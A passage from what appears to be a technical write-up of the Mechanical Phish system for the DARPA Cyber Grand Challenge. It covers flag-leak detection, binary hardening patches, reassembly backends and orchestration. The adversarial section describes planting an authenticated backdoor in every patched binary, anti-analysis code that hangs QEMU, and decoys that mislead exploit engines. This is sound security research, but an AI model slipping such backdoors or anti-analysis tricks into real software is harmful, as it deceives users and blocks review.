exploit. Point to Flag constrains the input to + point at the flag page, or at any copy of flag data in memory, then + uses Colorguard to determine if the new input causes an exploitable + leak. + +- Arbitrary Read/Write - Exploration + In some cases, the dereference of user-controlled data can lead to a + more powerful exploit later. For example, a vtable overwrite will + first appear as an arbitrary read, but if that memory address points + to user data, then the read will result in a controlled ip. 
To + explore arbitrary reads/writes for a better crash, the address of the + read or write is constrained to point to user data, then the input is + re-traced as a new crash. + +- Write-What-Where + If the input from the user controls both the data being written and + the address to which it is written, we want to identify valuable + targets to overwrite. This is done by symbolically exploring the + crash, to identify values in memory that influence the instruction + pointer, such as return addresses or function pointers. Other + valuable targets are pointers that are used to print data; + overwriting these can lead to type-2 exploits. + + +--[ 003.003 - Colorguard + +As explained above, there are some challenges which include +vulnerabilities that can leak flag data, but do not cause a crash. One +challenge here is that it is difficult to detect when a leak occurs. You +can check if any 4 bytes of output data are contained in the flag page, +but this will have false positives while fuzzing, and it will miss any +case where the data is not leaked directly. The challenge authors seem to +prefer to xor the data or otherwise obfuscate the leak, maybe to prevent +such a method. + +To accurately detect these leaks we chose to trace the inputs +symbolically, using angr. However, symbolic tracing is far too slow to run +on every input that the fuzzer generates. Instead, we only perform the +symbolic tracing on the inputs which the fuzzer considers "interesting". +The hope here is that the leak causing inputs have a new transition, or +number of loops which is unique, and that the fuzzer will consider it +interesting. There are definitely cases where this doesn't work, but it's +a fairly good heuristic for reducing the number of traces. + +In an effort to further combat the slowness of symbolic execution, +Colorguard takes advantage of angr's concrete emulation mode. 
Since no +modification of the input has to be made if a flag leak is discovered, our +input is made entirely concrete, with the only symbolic data being that +from the flag page. This allows us to only execute symbolically +those basic blocks that touch the secret flag page contents. + +Colorguard traces the entire input concretely and collects the symbolic +expression for the data that is printed to stdout. The expression is +parsed to identify any four consecutive bytes of the flag page that are +contained in the output. For each set of bytes, the solver is queried to +check if we can compute the values of the bytes only from the output data. +If so, then an exploit is crafted which solves for these four bytes after +receiving the output from the program execution. + +One caveat here is that challenges may use many bytes of the flag page as +a random seed. In these cases we might see every byte of the flag page as +part of the expression for stdout. Querying the constraint solver for +every one of these consecutive four byte sequences is prohibitively slow, +so it is necessary to pre-filter such expressions. Colorguard does this +pre-filter during the trace by replacing any expression containing more +than 13 flag bytes with a new symbolic variable. The new symbolic variable +is not considered a potential leak. The number 13 was arbitrarily chosen +as it was high enough to still detect all of the leaks we had examples for, +but low enough that checking for leaks was still fast. + + +--[ 003.004 - Challenge Response + +A common pattern that still needs to be considered is where the binary +randomly chooses a value, outputs it, and then requires the user to input +that value or something computed from the random value. For example, the +binary prints "Solve the equation: 6329*4291" and then the user must input +"27157739". To handle these patterns in the exploit, we identify any +constraints that involve both user input and random data. 
Once identified, +we check the output that has been printed up to that point if it contains +the random data. If so, then we have identified a challenge-response. We +will include the output as a variable in the constraints that are passed +to the exploit, and then read from stdout, adding constraints that the +output bytes match what is received during the exploit. Then the solver +can be queried to generate the input necessary for the correct "response". + + + +--[ 004 - The Patching Component: Patcherex + + Original + Binary (CB) + || + || + ||=============================================== + || || + || || + \/ \/ + -------------------- -------------------- -------------------- + | TECHNIQUES | | PATCHES | | BACKENDS | + | | | | | | + | ++++++++++++++ | | | | | + | + Return + | | - AddROData() | | | + | + Pointer + --------> - AddCode() | | +++++++++++++++ | + | + Encryption + | | - ... | | + Detour + | + | ++++++++++++++ | | | | + Backend + | + | | | | | + + | + | ++++++++++++++ | | | | +++++++++++++++ | + | + Transmit + | | - InsertCode() | | | + | + Protection + --------> - AddRWData() |==>| OR | + | + + | | - ... | | | + | ++++++++++++++ | | | | +++++++++++++++ | + | | | | | + Reassembler + | + | ++++++++++++++ | | | | + Backend + | + | + + | | - AddCode() | | + + | + | + Backdoor + --------> - AddRWData() | | +++++++++++++++ | + | + + | | - ... | | | + | ++++++++++++++ | | | | | + | | | | | | + | ... | | | | | + -------------------- -------------------- -------------------- + || + || + \/ + Replacement + Binary (RB) + + +Patcherex, which is built on top of angr, is the central patching system of +Mechanical Phish. As illustrated in the overview image, Patcherex is +composed of three major components: techniques, patches, and patching +backends. + +* Techniques + +A technique is the implementation of a high-level patching strategy. A set +of patches (described below) with respect to a binary are generated after +applying a technique on it. 
Currently, Patcherex
+implements three different types of techniques:
+
+- Generic binary hardening techniques, including Return Pointer
+  Encryption, Transmit Protection, Simple Control-Flow Integrity,
+  Indirect Control-Flow Integrity, and Generic Pointer Encryption;
+- Techniques aimed at preventing rivals from analyzing or stealing our
+  patches, including backdoors, anti-analysis techniques, etc.;
+- Optimization techniques that make binaries more performant, including
+  constant propagation, dead assignment elimination, and redundant
+  stack variable removal.
+
+* Patches
+
+A Patch is a low-level description of how a fix or an improvement should
+be made to the target binary. Patcherex defines a variety of patch types
+to perform tasks ranging from code/data insertion and removal to segment
+altering.
+
+* Backends
+
+A backend takes the patches generated by one or more techniques and
+applies them to the target binary. Two backends are available in
+Patcherex:
+
+- ReassemblerBackend: this backend takes a binary, completely
+  disassembles it, symbolizes all code and data references among code
+  and data regions, and then generates an assembly file. It then applies
+  patches to the assembly file and calls an external assembler (clang,
+  in the case of CGC) to reassemble the patched assembly file into the
+  final binary.
+- DetourBackend: this backend acts as a fallback to the
+  ReassemblerBackend. It performs in-line hooking and detouring to apply
+  patches.
+
+
+--[ 004.001 - Patching Techniques
+
+In this section, we describe all the techniques we implemented in
+Patcherex.
+
+Obviously, we tried to implement techniques that prevent exploitation of
+the given CBs by making their bugs non-exploitable. In some cases,
+however, our techniques do not render the bugs completely unexploitable,
+but they still force an attacker to adapt their exploits to our RBs. 
For
+instance, some techniques introduce differences in the memory layout
+between our generated RB and the original CB that an attacker may have
+used to develop their exploit. In addition, we try to prevent attackers
+from adapting exploits to our RB by adding anti-analysis techniques to
+our generated binaries. Furthermore, although we put significant effort
+into minimizing the speed and memory impact of our patches, it is often
+impossible to keep the performance impact below 5% (a CB's score starts
+to be lowered when it has more than 5% speed or memory overhead). For
+this reason we decided to "optimize" the produced RB, as we will explain
+later.
+
+--[ 004.001.001 - Binary Hardening Techniques
+
+We implemented several techniques for generic binary hardening. These
+general hardening techniques, although not extremely complex, turned out
+to be very useful in the CFE.
+
+Vulnerability-targeted hardening (targeted patching) was also planned
+initially. However, due to lack of manpower and the fear of deploying
+replacement CBs too many times for the same challenge, we did not fully
+implement or test our targeted patching strategies.
+
+* Return Pointer Encryption
+
+This technique was designed to protect against classical stack buffer
+overflows, which typically give an attacker control over an overwritten
+saved return pointer. Our defense mechanism "encrypts" every return
+pointer saved on the stack when a function is called, by modifying the
+function's prologue. The encrypted pointer is then "decrypted" before
+every ret instruction terminating the same function. For encryption and
+decryption we simply xor the saved return pointer with a nonce (randomly
+generated at program startup). Since the added code is executed every
+time a function is called, we take special care to minimize the
+performance impact of this technique.
+
+First of all, this technique is not applied to functions determined to
+be safe. 
We classify a function as safe if one of these three
+conditions holds:
+
+- The function does not access any stack buffer.
+- The function is called by more than 5 different functions. In this
+  case, we assume that the function is some standard "utility" function,
+  and it is unlikely to contain bugs. Even if it does contain bugs, the
+  performance cost of patching such a function is usually too high.
+- The function is a common library function, such as printf or free.
+  Again, we assume that library functions are unlikely to contain bugs.
+  These common library functions are identified by running the functions
+  with test input and output pairs. This function identification
+  functionality is offered by a separate component (the "Function
+  identifier" mentioned in the "Warez" Section).
+
+To further improve performance, the code snippet that encrypts and
+decrypts the saved return pointer uses, when possible, a "free" register
+to perform its computations. This avoids saving and restoring the value
+of a register every time the injected code is executed. We identify free
+registers (at a specific code location) by looking for registers in
+which a write operation always happens before any read operation. This
+analysis is performed by exploring the binary's CFG in a depth-first
+manner, starting from the analyzed code location (i.e., the location
+where the code encrypting/decrypting the return pointer is injected).
+
+Finally, to avoid negatively impacting the functionality of the binary,
+we did not patch functions in which the CFG reconstruction algorithm had
+trouble identifying the prologue and the epilogues. In those cases, if
+an epilogue of the analyzed function is not identified, the encrypted
+return address will not be decrypted when that epilogue is reached, and
+consequently the program will use the still-encrypted return pointer on
+the stack as the return target. 
This scenario typically happens when
+the compiler applies tail-call optimization by inserting jmp
+instructions at the end of a function.
+
+* Transmit Protection
+
+As a defense mechanism against Type 2 exploits, we inject code around
+the transmit syscall so that a binary is forbidden from transmitting any
+4 contiguous bytes of the flag page. The injected code uses an array to
+keep track of the last transmitted bytes, so that it can identify cases
+in which bytes of the flag page are leaked one at a time.
+
+* Simple Control-Flow Integrity
+
+To protect indirect control flow instructions (e.g., call eax, jmp ebx),
+we inject, before any instruction of this kind, code that checks
+specific properties of the target address (i.e., the address at which
+the instruction pointer will point after the call or jump). The specific
+checks are:
+
+- The target address must be an allocated address (to prevent an
+attacker from using the indirect control-flow instruction to directly
+perform a Type 1 attack). To do so, we try to read from the target
+address, so that if the address does not point to an allocated region
+the program will crash before the instruction pointer is modified. This
+prevents simple Type 1 exploits, because the attacker must control at
+least 20 bits of the instruction pointer, and it is unlikely (but not
+impossible) that the negotiated value will end up inside an allocated
+memory region.
+
+- The target address must be inside the memory range where the binary's
+code is typically loaded (for simplicity, we consider a "potential code"
+address to be any address below 0x4347c000). To avoid breaking programs
+that use dynamically allocated code, we do not perform this check if we
+statically detect that the analyzed program calls the allocate syscall
+in a way which will create additional executable memory.
+
+- The target address must not be a pop instruction. 
As a partial mitigation
+against ROP attacks, we dynamically check whether the target of an
+indirect call is a pop instruction and, if it is, terminate the program.
+
+* Uninitialized Data Cleaning
+
+For each function, we identify all of the instructions that read and
+write stack variables, and the stack offsets that are accessed. If there
+is any path through the CFG on which a stack variable is read before it
+is written, we consider it possible that uninitialized data is being
+used. For each variable detected in a potential uninitialized data
+usage, we zero that variable by adding stack cleaning code at the
+beginning of the function.
+
+* Stack Base Address Randomization
+
+At program startup we add a random value (which can assume any 16-byte
+aligned value between 16 and 1024) to the stack pointer. This adds
+indeterminism to the position of the stack, hindering any exploit that
+makes assumptions about the program's stack layout.
+
+* malloc Protection
+
+To interfere with the exploitation of heap overflows, if we are able to
+identify a malloc-like function inside the analyzed CB, we slightly
+modify its behavior. In particular, we change the number of bytes
+allocated by a small, pseudo-random value.
+
+* printf Protection
+
+For every printf-like function identified, such as printf, snprintf,
+etc., we ensure that the function is not used to perform a "format
+string" attack. Specifically, if the format string parameter is neither
+in the binary's read-only memory nor a string already present in the
+binary, we stop the execution of the binary if:
+- The format string parameter contains a meta character (e.g., "%").
+- The format string parameter points to the flag page.
+
+
+--[ 004.001.002 - Adversarial Techniques
+
+Certain techniques are introduced to prevent rivals from analyzing, or
+even running, our RBs in a controlled environment, while leaving those
+RBs still able to run in the real game environment. 
These techniques are
+presented in this section.
+
+* Anti-analysis
+
+We add some code, executed before the original entry point of the
+binary, to interfere with analyses that other teams could perform on our
+patched binary. Specifically, we add code to:
+- Detect whether the binary is executed under QEMU or PIN. To do so, we
+  probe implementation details that are difficult to emulate correctly,
+  such as segment registers, transmission of partially allocated memory
+  regions, and syscall error code values in case of "double failure". In
+  addition, we add some code triggering a previously unknown
+  implementation bug in QEMU, making it stall. Specifically, during the
+  development of our CRS, we found that QEMU, when using user-mode
+  emulation, does not correctly handle taking the square root of an
+  "un-normal" floating point number, that is, a nonzero 80-bit float
+  whose explicit integer bit (the highest bit of the mantissa) is zero.
+  When this happens, QEMU hangs forever. Because of this anti-QEMU
+  patch, some of our RBs broke the live visualization during the CFE
+  public event.
+- Interfere with symbolic execution engines. Our adversarial code
+  contains self-modifying code designed to be extremely hard to simulate
+  correctly and efficiently by a symbolic execution engine. In addition,
+  some added code is specifically designed to trigger "path explosion"
+  conditions.
+- Interfere with automatic exploitation systems. We add code to transmit
+  the flag page to file descriptor 2 (stderr). Although data transmitted
+  to this file descriptor is not sent to a CRS interacting with a
+  binary, an opponent could mistakenly assume that any 4 contiguous
+  bytes transmitted from the flag page constitute a Type 2 exploit and
+  thus field a POV trying to leverage this "fake" leak. In addition, we
+  inject "fake backdoor" code. This code is triggered if a CRS sends a
+  specific 4-byte sequence. 
When triggered, it reads from the CRS 8
+  bytes used to set the program's instruction pointer and the value of a
+  register. For this reason, this code looks easily exploitable to
+  create a Type 1 POV; however, the read values are xor'ed with a random
+  value before being used to set the instruction pointer and the
+  register, making this code non-exploitable.
+
+In addition, to counteract an adversary fielding one of our own patched
+binaries as its own patched binary, we inject a backdoor into every
+fielded patched binary. This backdoor can be used by our CRS to exploit
+the patched binaries we generate, but it is designed to be extremely
+hard for other teams' CRSs to exploit. The backdoor is triggered when a
+specific 4-byte sequence is received. To detect this, the function
+wrapping the receive syscall is modified to keep track of the first 4
+bytes a program receives. Once triggered, the backdoor sends the CRS a
+"challenge" C (which is a 19-bit value), and the CRS responds with a
+response R (a 64-bit value). Then, the backdoor code checks whether the
+following condition is true:
+first_32_bits_of(SHA1(pad(R,160))) == pad(C,32), where pad(A,N) is a
+function padding the input value A up to N bits by adding zeros.
+
+The challenge can easily be solved by pre-computing all the possible
+responses, but it is impossible for an opponent's POV to compute a
+solution to the challenge within the game-imposed 10-second timeout.
+
+
+--[ 004.001.003 - Optimization Techniques
+
+Performance is a vital concern of our patching strategy. While we stress
+the necessity of optimizing all our patching techniques, some overhead
+cannot be avoided. From analyzing binaries collected from CQE and CFE
+samples, we noticed that most of them are compiled at O0, i.e., without
+optimization enabled. 
We do not know why the organizers decided not to optimize
+most of the provided challenges, but we speculate that this choice may
+have been made to leave room for optimizations and patching.
+
+It is well-known that O0 and O1 binaries can have a huge difference in
+execution time. Fortunately, some of the optimization methods used in O1
+are not that difficult to perform directly on binaries. Further, angr
+provides all necessary data-flow analysis techniques, which makes the whole
+optimization development easier. Finally, with the help of the
+ReassemblerBackend, we can easily and completely remove instructions that
+we want to get rid of, without having to replace them with nops. Therefore,
+we implemented some basic in-line binary optimization techniques in order
+to optimize O0 binaries in the CFE, which are described below.
+
+
+- Constant Propagation. We propagate constants used as immediates in each
+  instruction, and eliminate unnecessary mov instructions in assembly code.
+- Dead Assignment Elimination. Many unnecessary assignments occur in
+  unoptimized code. For example, when a function reads arguments passed on
+  the stack, it will always make a copy of the argument into the local
+  stack frame, without checking if the argument is modified or not in the
+  local function. We perform a conservative check for cases where a
+  parameter is not modified at all in a function and the
+  copy-to-local-frame is unnecessary. In this case, the copy-to-local
+  instruction is eliminated, and all references to the corresponding
+  variable on the local stack frame are altered to reference the original
+  parameter on the previous stack frame. Theoretically, this may break
+  locality, but we noticed some improvement in performance in our off-line
+  tests.
+- Redundant Stack Variable Removal. In unoptimized code, registers are not
+  allocated optimally, and usually many registers end up not being used. 
We
+  perform a data-flow analysis on individual functions, and try to replace
+  stack variables with registers. This technique works well with variables
+  accessed within tight loops. Empirically speaking, this technique
+  contributes the most to the overall performance gain we have seen during
+  testing.
+
+Thanks to these optimizations, our patches often had *zero* overall
+performance overhead.
+
+--[ 004.002 - Patches
+
+The techniques presented in the previous section produce, as output, lists
+of patches. In Patcherex, a patch is a single modification to a binary.
+
+The most important types of patches are:
+
+- InsertCodePatch: add some code that is going to be executed before an
+  instruction at a specific address.
+- AddEntryPointPatch: add some code that is going to be executed before the
+  original entry point of the binary.
+- AddCodePatch: add some code that other patches can use.
+- AddRWData: add some readable and writable data that other patches can
+  use.
+- AddROData: add some read-only data that other patches can use.
+
+Patches can refer to each other using a simple symbol system. For instance,
+code injected by an InsertCodePatch can contain an instruction like call
+check_function. In this example, this call instruction will call the code
+contained in an InsertCodePatch named check_function.
+
+
+--[ 004.003 - Backends
+
+We implemented two different backends to inject different patches. The
+DetourBackend adds patches by inserting jumps inside the original code,
+whereas the ReassemblerBackend adds code by disassembling and then
+reassembling the original binary. The DetourBackend generates bigger (thus
+using more memory) and slower binaries (and in some rare cases it cannot
+insert some patches); however, it is slightly more reliable than the
+ReassemblerBackend (i.e., it breaks functionality in slightly fewer
+binaries).
+
+* DetourBackend
+
+This backend adds patches by inserting jumps inside the original code. 
To
+avoid breaking the original binary, information from the CFG of the binary
+is used to avoid placing the added jmp instruction in between two basic
+blocks. The added jmp instruction points to an added code segment in which
+first the code overwritten by the added jmp and then the injected code is
+executed. At the end of the injected code, an additional jmp instruction
+brings the instruction pointer back to its normal flow.
+
+In some cases, when the basic block that needs to be modified is too small,
+this backend may fail to apply an InsertCodePatch. This requires special
+handling, since patches are not, in the general case, independent (a patch
+may require the presence of another patch in order not to break the
+functionality of the binary). For this reason, when this backend fails to
+insert a patch, the patches "depending" on the failed one are not applied
+to the binary.
+
+* ReassemblerBackend
+
+The ReassemblerBackend fully disassembles the target binary, applies all
+patches on the generated assembly, and then assembles the assembly back
+into a new binary. This is the primary patching backend we used in the CFE.
+Being able to fully reassemble binaries greatly reduces the performance hit
+introduced by our patches, and enables binary optimization, which improves
+the performance of our RBs even further. Also, reassembling usually changes
+base addresses and function offsets, which achieves a certain level of
+"security by obscurity" -- rivals will have to analyze our RBs if they want
+to properly adapt their code-reusing and data-reusing attacks.
+
+We provide an empirical solution for binary reassembly that works on
+almost every binary from the CQE and CFE samples. The technique is
+open-sourced as a component in angr, and, after the CGC competition, it has
+been extended to work with generic x86 and x86-64 Linux binaries.
+
+A detailed explanation as well as an evaluation of this technique is
+published as an academic paper [Ramblr17]. 
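As an illustration of the detouring scheme described above, here is a
minimal sketch. It is our own simplification, not Patcherex code: it only
emits x86 rel32 jumps, the detour_patch helper and its arguments are
hypothetical names, and the hook location is assumed to cover whole
instructions of a single basic block.

```python
def rel32_jmp(src: int, dst: int) -> bytes:
    # Encode an x86 "jmp rel32" placed at address src, targeting dst.
    return b"\xe9" + ((dst - (src + 5)) & 0xFFFFFFFF).to_bytes(4, "little")

def detour_patch(text: bytearray, base: int, hook_va: int,
                 displaced: bytes, payload: bytes, cave_va: int) -> bytes:
    # Overwrite >= 5 bytes of whole instructions at hook_va with a jmp to
    # an added code segment.  The segment first runs the displaced
    # instructions, then the injected payload, then jmps back to the
    # instruction following the displaced ones.
    assert len(displaced) >= 5
    off = hook_va - base
    text[off:off + len(displaced)] = (rel32_jmp(hook_va, cave_va) +
                                      b"\x90" * (len(displaced) - 5))
    cave = displaced + payload
    cave += rel32_jmp(cave_va + len(cave), hook_va + len(displaced))
    return cave
```

The jmp-back target is the first instruction after the displaced bytes,
which is why the CFG is consulted: the overwritten range must not cut an
instruction in half or span two basic blocks.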
+ +--[ 004.004 - Patching Strategy + +We used Patcherex to generate, for every CB, three different Replacement +Binaries (RBs): + +- Detouring RB: this RB was generated by applying, using the DetourBackend, + all the patches generated by the hardening and adversarial techniques + presented previously. +- Reassembled RB: this RB was generated by applying the same patches used + by the Detouring RB, but using the ReassemblerBackend instead of the + DetourBackend. +- Optimized Reassembled RB: this RB was generated as the Reassembled one, + but, in addition all the patches generated by the optimization techniques + were added. + +These three patched RBs have been listed in order of decreasing performance +overhead and decreasing reliability. In other words, the Detouring RB is +the most reliable (i.e., it has the smallest probability of having broken +functionality), but it has the highest performance overhead with respect to +the original unpatched binary. On the contrary the Optimized Reassembled RB +is the most likely to have broken functionality, but it has a lower +performance impact. + + +--[ 004.005 - Replacement Binary Evaluation + +* Pre-CFE Evaluation + +During initial stages of Patcherex development, testing of the RBs was done +by an in-house developed component called Tester. Internally, Tester uses +cb-test, a utility provided by DARPA for testing a binary with +pre-generated input and output pairs, called polls. We made modifications +to cb-test, which enabled the testing of a binary and its associated IDS +rules on a single machine, whereas the default cb-test needs 3-machines to +test a binary with IDS rules. + +Tester can perform both performance and functionality testing of the +provided binary using the pre-generated polls for the corresponding binary +using its Makefile. For functionality testing, given a binary, we randomly +pick 10 polls and check that the binary passes all the polls. 
For
+performance testing, we compute the relative overhead of the provided
+binary against the unpatched one using all the polls. However, there was a
+huge discrepancy (~10%) between the performance overhead computed by us and
+that provided during sparring partner sessions for the same binaries.
+Moreover, during the sparring partner sessions, we also noticed that
+performance numbers were different across different rounds for the same
+binaries. Because of these discrepancies, and to be conservative, for every
+patching strategy we computed the performance overhead as the maximum
+overhead across all rounds of sparring partner sessions during which RBs
+with the corresponding patching strategy were fielded.
+
+During internal testing, we used all the available binaries publicly
+released on GitHub (some of which were designed for the CQE event, whereas
+others were sample CFE challenges). To further extend our test cases, we
+recompiled all the binaries using different compilation flags influencing
+the optimization level used by the compiler. In fact, we noticed that
+heavily optimized binaries (e.g., -O3) were significantly harder to
+analyze and to patch without breaking functionality. Specifically, we used
+the following compilation flags: -O0, -Os, -Oz, -O1, -O2, -O3, -Ofast.
+Interestingly, we noticed that some of the binaries, when recompiled with
+specific compilation flags, failed to work even when not patched.
+
+During the final stages of Patcherex development, we noticed that almost
+none of the generated RBs ever failed the functionality tests and that the
+performance overhead was reasonable except for a few binaries. This,
+combined with the discrepancy inherent in performance testing, led us not
+to use any in-depth testing of our replacement binaries during the CFE.
+
+* CFE Evaluation
+
+For every RB successfully generated, Patcherex first performs a quick test
+of its functionality. The test is designed to spot RBs that are broken by
+the patching strategy. 
In particular, Patcherex only checks that every
+generated RB does not crash when provided with a small test set of
+hardcoded input strings ("B", "\n", "\n\n\n\n\n\n", etc.).
+
+We decided to perform only minimal functionality tests because of
+performance and reliability considerations.
+
+--[ 004.006 - Qualification Round Approaches
+
+It is worth mentioning that for the CGC qualification round, the rules were
+very different from the final round. Between this and the fact that our
+analysis tools were not yet mature, it was necessary for us to approach
+patching very differently from the final round approaches previously
+described.
+
+In the qualification round, the only criterion for "exploitation" was a
+crash. If you could crash a binary, it meant that you could exploit it, and
+if your binary could crash, it meant that you were vulnerable. Furthermore,
+the qualification scoring formula was such that your "defense" score, i.e.,
+how many vulnerabilities your patch protected against, was a global
+multiplier for your score between zero and one. This meant that if you
+didn't submit a patch for a binary, or if your patch failed to protect
+against any of the vulnerabilities, you received zero points for that
+challenge, regardless of how well you were able to exploit it.
+
+This is such an unconventional scoring system that when we analyzed the
+(publicly available) patches produced by other teams for the qualification
+round, we found that at least one qualifying team had a patching strategy
+such that whenever they discovered a crash, they patched the crashing
+instruction to simply call the exit syscall. This is technically not a
+crash, so the teams that did this did in fact receive defense points for
+the challenges, and accordingly did in fact receive a non-negligible score
+for effectively stubbing out any vaguely problematic part of the binary.
+
+Our approaches were slightly more nuanced! 
There were two techniques we
+developed for the qualification round: one "general" technique, meaning
+that it could be applied to a program without any knowledge of the
+vulnerabilities in a binary, and one "targeted" technique, meaning that it
+was applied based on our CRS' knowledge of a vulnerability. Each of the
+techniques could produce several candidate patched binaries, so we had to
+choose which one to submit in the end - our choice was based on some
+rudimentary testing to try to ascertain if the binary could still crash,
+and if not, to assess the performance impact of the patch.
+
+It is important to note that, for CQE, the patched binaries were tested by
+the organizers against a fixed set of pre-generated exploits. For this
+reason, our patched binaries just had to avoid being exploited by the
+exploits developed for the original, unpatched, version of the program. In
+other words, the attacker had no way to adapt its exploits to our patches,
+and so "security through obscurity" techniques were extremely effective
+during the qualification event.
+
+
+--[ 004.006.001 - Fidget
+
+Our "general" patching technique for CQE was a tool called Fidget. Fidget
+was developed the summer prior to the announcement of the CGC for use in
+attack-defense CTFs. Its basic intuition is that the development of an
+attack makes a large number of very strong assumptions about the internal
+memory layout of a program, so in many cases simply tweaking the layout of
+stack variables is a reliable security-through-obscurity technique.
+
+At the time of the CQE, Fidget was a tool capable of expanding function
+stack frames, putting unused space in between local variables stored on the
+stack. This alone is clearly not sufficient to prevent crashes, as the
+strange qualification scoring formula requires. 
However, the tool had an +additional mode that could control the amount of padding that was inserted; +the mode that we used attempted to insert thousands of bytes of padding +into a single stack frame! The idea here is, of course, that no overflow +attack would ever include hundreds of bytes more than strictly necessary to +cause a crash. + +The primary issue with Fidget is that it's pretty hard to tell that +accesses to different members or indexes of a variable are actually +accesses to the same variable! It's pretty common for Fidget to patch a +binary that uses local array and struct variables liberally, and the +resulting patched binary is hilariously broken, crashing if you so much as +blow on it. There are a huge number of heuristics we apply to try not to +separate different accesses to the same variable, but in the end, variable +detection and binary type inference are still open problems. As a result, +Fidget also has a "safe mode" that does not try to pad the space in between +variables, instead only padding the space between local variables and the +saved base pointer and return address. + +We originally planned to use Fidget in the final round, since it had the +potential to disrupt exploits that overflow only from one local variable +into an adjacent one, something that none of our final-round techniques can +address. However, it was cut from our arsenal at the last minute upon the +discovery of a bug in Fidget that was more fundamental than our ability to +fix it in the limited time available! Unfortunate... + + +--[ 004.006.002 - CGrex + +If we know that it's possible for a binary to crash at a given instruction, +why don't we just add some code to check if that specific instruction would +try to access unmapped or otherwise unusable memory, and if so exit cleanly +instead of crashing? This is exactly what CGrex does. 
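On DECREE, CGrex implemented this check by abusing the error codes of the
random and fdwait syscalls, as detailed below. As a rough stand-in on
Linux -- our own sketch, not CGrex code -- one can let the kernel probe
the address for us: a write() from a candidate address into a pipe fails
with EFAULT on unmapped memory instead of crashing the process.

```python
import ctypes
import os

libc = ctypes.CDLL(None, use_errno=True)

def is_readable(addr: int) -> bool:
    # Ask the kernel to copy one byte from addr into a pipe.  If the page
    # is unmapped, write() returns -1 (EFAULT) rather than segfaulting us.
    r, w = os.pipe()
    try:
        return libc.write(w, ctypes.c_void_p(addr), 1) == 1
    finally:
        os.close(r)
        os.close(w)
```

Injected checking code of this kind evaluates the culprit instruction's
address expression (e.g. ebx*4+2), probes the resulting address, and calls
exit instead of letting the access fault.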
+
+Our reassembler was not developed until several weeks before the CGC final
+event, so for the qualification round CGrex was implemented with a
+primitive version of what then became the DetourBackend. Once our CRS found
+a crash, the last good instruction pointer address was sent to CGrex, which
+produced a patched binary that replaced all crashing instructions with
+jumps to a special inserted section that used some quirks in some syscalls
+to determine if the given memory location was readable/writable/executable,
+and exited cleanly if the instruction would have produced a crash.
+
+More precisely, CGrex takes, as input, a list of POVs and a CB, and it
+outputs a patched CB "immune" against the provided POVs. CGrex works in
+five steps:
+
+1) Run the CGC binary against a given POV using a modified QEMU version
+   with improved instruction trace logging and able to run CGC binaries.
+
+2) Detect the instruction pointer where the POV generates a crash (the
+   "culprit instruction").
+
+3) Extract the symbolic expression of the memory accesses performed by the
+   "culprit instruction" (by using Miasm). For instance, if the crashing
+   instruction is mov eax, [ebx*4+2] the symbolic expression would be
+   ebx*4+2.
+
+4) Generate "checking" code that dynamically:
+   - Compute the memory accesses that the "culprit instruction" is going
+     to perform.
+   - Verify that these memory accesses are within allocated memory regions
+     (and so the "culprit instruction" is not going to crash). To
+     understand if some memory is allocated or not, CGrex "abuses" the
+     return values of the random and fdwait syscalls.
+
+     In particular, these syscalls were used by passing as one of the
+     parameters the value to be checked. The kernel code handling these
+     functions verifies that, for instance, the pointer where the number of
+     random bytes returned by random is written actually points to
+     writable memory, and it returns a specific error code if not. 
CGrex + checks this error code to understand if the tested memory region is + allocated. Special care is taken so that, no matter if the tested + memory location is allocated or not, the injected syscall will not + modify the state of the program. + + - If a memory access outside allocated memory is detected, the injected + code just calls exit. + +5) Inject the "checking" code. + +Steps 1 to 5 are repeated until the binary does not crash anymore with all +the provided POVs. + + + +--[ 005 - Orchestration + + +--------+ +---------+ + CGC endpoints | TI API | | IDS tap | + +--------+ +---------+ + . . + / \ / \ + | | +-----------------------------|--------------|------------------------------ + | | + Mechanical Phish \ / \ / + ' ' + +------------+ +------------+ + | Ambassador | |Network Dude| + +------------+ +-+----------+ + | | + +------------+ +------------+ | | + | Meister | | Scriba | | | + +-----+------+ +-------+----+ | | + | | | | +--------------------------------+ + +--------+--------+ | | | Worker | + | | | | | + _----------_ | | | Poll creator AFL Driller | + ( )<---------+ | | ============ === ======= | + |`----------`|<-------------+ | Tester POV Tester POV Fuzzer | + | |<---------------+ ====== ========== ========== | + | Farnsworth | | Patcherex Colorguard Rex | + ( ) | ========= ========== === | + `----------` +--------------------------------+ + + +Designing a fully autonomous system is a challenging feat from an +engineering perspective too. In the scope of the CFE, the CRS was required +to run without fault for at least 10 hours. Although it was proposed to +allow debugging during the CFE, eventually, no human intervention was +permitted. + +To that end, we designed our CRS using a microservice-based approach. Each +logical part was split following the KISS principle ("Keep it simple, +stupid") and the Unix philosophy ("Do one thing and do it well"). 
+ +Specifically, the separation of logical units allowed us to test and work +on every component in complete isolation. We leveraged Docker to run +components independently, and Kubernetes to schedule, deploy, and control +component instances across all 64 nodes provided to us. + + +--[ 005.001 - Components + +Several different components of Mechanical Phish interacted closely +together during the CRS (see diagram above). In the following, we will +briefly talk about the role of each component. + +* Farnsworth + + Farnsworth is a Python-based wrapper around the PostgreSQL database, and + stores all data shared between components: CBs, POVs, crashing inputs, + synchronization structures, etc. In our design, we prohibited any direct + communication between components and required them to talk "through" + Farnsworth. Therefore, Farnsworth was a potential single point of + failure. To reduce the associated risk for the CFE, we paid particular + attention to possible database problems and mitigated them accordingly. + +* Ambassador + + Ambassador was the component that talked to the CGC Team Interface (TI) + to retrieve CBs, obtain feedback, and submit RBs and POVs. In the spirit + of KISS, this component is the only part of Mechanical Phish to + communicate externally and the only source for the ground truth in + respect to the game state. + +* Meister + + Meister coordinated Mechanical Phish. For each component, a component- + specific creator decided which jobs should be run at any point in the + game, based on information obtained through Farnsworth and written by + Ambassador. Consequently, Meister decided which jobs to run based on the + priority information of each job (as specified by the creator) and usage + of the nodes in terms of CPU and memory. Note that, specifically, Meister + and its creators were entirely stateless. 
At any point, it could crash,
+  yet it would not kill existing jobs upon automatic restart if they were
+  still considered important by the creators.
+
+* Scriba
+
+  An important task of the CRS was to select and submit the POVs and RBs.
+  Scriba looked at performance results of exploits and patches and decided
+  what and when to submit (for more details on the selection strategy see
+  Section 6 - Strategy). As mentioned previously, after Scriba decided what
+  and when to submit, Ambassador actually submitted to the TI (as
+  Ambassador is the only component allowed to communicate externally).
+
+* Network Dude
+
+  The Network Dude component received UDP traffic coming from the IDS tap
+  and stored it into the database via Farnsworth. Since it was required to
+  receive packets at line speed, neither parsing nor analysis of the
+  network data was performed within Network Dude; instead, we relied on
+  different components to process the network traffic.
+
+* Worker
+
